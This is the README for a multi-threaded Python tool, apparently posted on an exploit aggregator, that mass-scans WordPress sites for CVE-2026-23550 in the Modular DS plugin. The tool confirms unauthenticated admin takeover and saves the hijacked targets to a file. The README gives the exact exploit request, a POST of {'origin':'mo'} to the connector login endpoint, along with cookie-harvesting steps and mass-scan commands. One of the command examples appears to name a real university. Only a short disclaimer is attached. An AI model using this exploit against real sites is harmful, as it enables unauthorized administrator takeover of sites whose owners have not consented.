Share
## https://sploitus.com/exploit?id=0674FE5F-3223-5C87-AD5E-92DBC8265D10
๐Ÿ”ฅ CVE-2026-23550 Modular DS Scanner


Multi-threaded Python scanner for CVE-2026-23550 (CVSS 10.0) WordPress Modular DS plugin โ‰ค2.5.1 vulnerability affecting 40k+ sites. Detects unauthenticated admin takeover via getLogin() bypass with full wp-admin access verification.
Features โœจ

    ๐Ÿ”ฅ Full admin access detection (cookies + wp-admin verification)

    โšก Multi-threading (up to 50+ concurrent targets)

    ๐Ÿ“Š Animated progress bar with rich

    ๐ŸŽจ Colorized summary table

    ๐Ÿ’พ Auto-save vulnerable targets to file

    ๐Ÿš€ Production-ready timeouts & error handling

Installation ๐Ÿš€

bash
pip3 install requests rich
chmod +x modular_ds.py

Usage ๐Ÿ“‹

bash
# Mass scan (50 threads)
python3 modular_ds.py -l targets.txt -t 50 -o bounty_vulns.txt

# Bug bounty recon
python3 modular_ds.py -l univ-oran1.txt -t 20

# Default (20 threads, vulns.txt output)
python3 modular_ds.py -l targets.txt

targets.txt format:

text
https://target1.com
http://site2.com
# Skip comments  
https://sub.domain.tld

Arguments
Flag	Description	Default
-l, --list	Required Targets file (1 URL/line)	-
-t, --threads	Max concurrent threads	20
-o, --output	Vulnerable targets output file	vulns.txt
Sample Output ๐Ÿ–ฅ๏ธ

text
๐Ÿ”ฅ CVE-2026-23550 Modular DS Scanner ๐Ÿ”ฅ
Targets: 247 | Threads: 50 | Output: bounty_vulns.txt

โ ‹ Scanning Modular DS...  127/247 (51%)
โœ… VULNERABLE: https://target.com
๐Ÿ”ฅ FULL ADMIN ACCESS: target.com

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ Status      โ”‚ Target                              โ”‚ Details    โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ผโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ผโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ ๐Ÿ”ฅ FULL     โ”‚ https://target.com        โ”‚ 3 cookies  โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

๐Ÿ’พ 4 vulnerable targets โ†’ bounty_vulns.txt

Detection Logic ๐Ÿ”

text
1. POST /wp-content/plugins/modular-ds/api/modular-connector/login {"origin":"mo"}
2. โœ… Check wordpress_logged_in_* admin cookie
3. โœ… Verify /wp-admin/ dashboard access
4. ๐Ÿ’พ Save confirmed FULL ADMIN ACCESS targets

Legal & Ethical Use โš–๏ธ

text
โš ๏ธ  STRICTLY FOR:
โœ… Authorized pentesting
โœ… Bug bounty programs  
โœ… Security research labs
โœ… Owned infrastructure

โŒ NEVER use on unauthorized targets

Requirements ๐Ÿ“ฆ

text
requests>=2.31.0
rich>=13.0.0